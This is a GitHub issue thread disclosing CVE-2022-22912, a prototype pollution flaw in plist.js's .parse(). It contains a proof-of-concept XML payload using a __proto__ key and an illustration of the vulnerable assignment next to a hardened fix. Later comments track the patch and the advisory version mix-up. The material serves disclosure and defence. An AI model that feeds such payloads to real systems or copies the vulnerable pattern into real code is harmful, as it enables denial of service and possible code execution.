CVE-2022-22912: Prototype Pollution using .parse() · Issue #114 · TooTallNate/plist.js

Prototype pollution vulnerability via .parse() in Plist before v3.0.4 allows attackers to cause a Denial of Service (DoS) and may lead to remote code execution.

Closed

keerok opened this issue on Jan 6, 2022 · 6 comments

Hi, there's a prototype pollution in .parse() related to the XML that is being parsed in it. In the following example the prototype pollution will affect the length parameter.

```js
var plist = require('plist');

// Normal parse
var xml = `<plist version="1.0">
  <key>metadata</key>
  <dict>
    <key>bundle-identifier</key>
    <string>com.company.app</string>
  </dict>
</plist>`;

console.log(plist.parse(xml));
// END OF THE NORMAL CODE EXAMPLE!

// PROTOTYPE POLLUTION
var xmlPollution = `<plist version="1.0">
  <dict>
    <key>__proto__</key>
    <dict>
      <key>length</key>
      <string>polluted</string>
    </dict>
  </dict>
</plist>`;

console.log(plist.parse(xmlPollution).length); // polluted
```

  • More information about the vulnerability: https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf

ghost mentioned this issue on Mar 2, 2022

The GitHub advisory states this vulnerability has been fixed in 3.0.4, but I can still reproduce it in 3.0.4 as well.

Version 3.0.4 was released back in August 2021 and the vulnerability was reported in January 2022. The 3.0.4 version only inlines an external dependency, so it does little in terms of security.

The vulnerable code seems to be in the parsePlistXML function:

new_obj[key] = parsePlistXML(node.childNodes[i]);

@TooTallNate I will try to submit a PR to fix this vulnerability in the next few days, unless you want to fix it yourself.
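To show why the assignment named in the comment above is dangerous, here is an added example that is not plist's own code: a minimal stand-in for the dict-building loop, with the plain `new_obj[key] = value` pattern beside a hardened variant and a check a consumer can run on the parsed result. The input is a constructed token tree standing in for the already-tokenised XML (a string, or an array of [key, node] pairs for a `<dict>`); it is an assumption of this example, not plist's internal representation.

```javascript
// Added example, not code from plist.js. A "node" is a constructed stand-in
// for tokenised plist XML: a string, or an array of [key, node] pairs
// representing a <dict>.

// Vulnerable pattern: plain assignment. For the key "__proto__" this does not
// create an own property; it invokes the Object.prototype.__proto__ setter and
// replaces the prototype of the object being built, so attacker-chosen
// properties such as "length" appear on the result.
function buildVulnerable(node) {
  if (typeof node === 'string') return node;
  const out = {};
  for (const [key, child] of node) {
    out[key] = buildVulnerable(child);
  }
  return out;
}

// Hardened pattern: define every key as an own data property, so "__proto__"
// (or any other document-controlled key) can never touch the prototype chain.
function buildSafe(node) {
  if (typeof node === 'string') return node;
  const out = {};
  for (const [key, child] of node) {
    Object.defineProperty(out, key, {
      value: buildSafe(child),
      enumerable: true, writable: true, configurable: true,
    });
  }
  return out;
}

// Detection helper for consumers: a parsed dict should still sit directly on
// Object.prototype; anything else means the document swapped the prototype.
function hasForeignPrototype(obj) {
  return Object.getPrototypeOf(obj) !== Object.prototype;
}

// Constructed input mirroring the xmlPollution document from the issue.
const pollutingDoc = [['__proto__', [['length', 'polluted']]]];

const bad = buildVulnerable(pollutingDoc);
const good = buildSafe(pollutingDoc);
console.log(bad.length, hasForeignPrototype(bad));   // polluted true
console.log(good.length, hasForeignPrototype(good)); // undefined false
```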

mreinstein added a commit that referenced this issue on Mar 21, 2022: Fix prototype pollution #114

Thanks for merging my PR, @mreinstein. Would you please release a new version of plist with this fix, so people can patch against this prototype pollution vulnerability?

Published as 3.0.5 on npm. Thanks for the PR!

This issue still happens on version 3.0.5 with Nexus scan.

@Donhv the problem appears to be that NIST has the vulnerability listed as addressed in 3.0.4:
https://nvd.nist.gov/vuln/detail/CVE-2022-22912

…but it was actually addressed in 3.0.5. Nexus has listed an “advisory deviation notice” because they tested 3.0.4 and found the vulnerability still extant. I’ve informed Nexus and hopefully they will update the status of 3.0.5. (Kudos that they go through the effort of verifying!)

Updated info: looks like the dist directory is missing the patch:
#128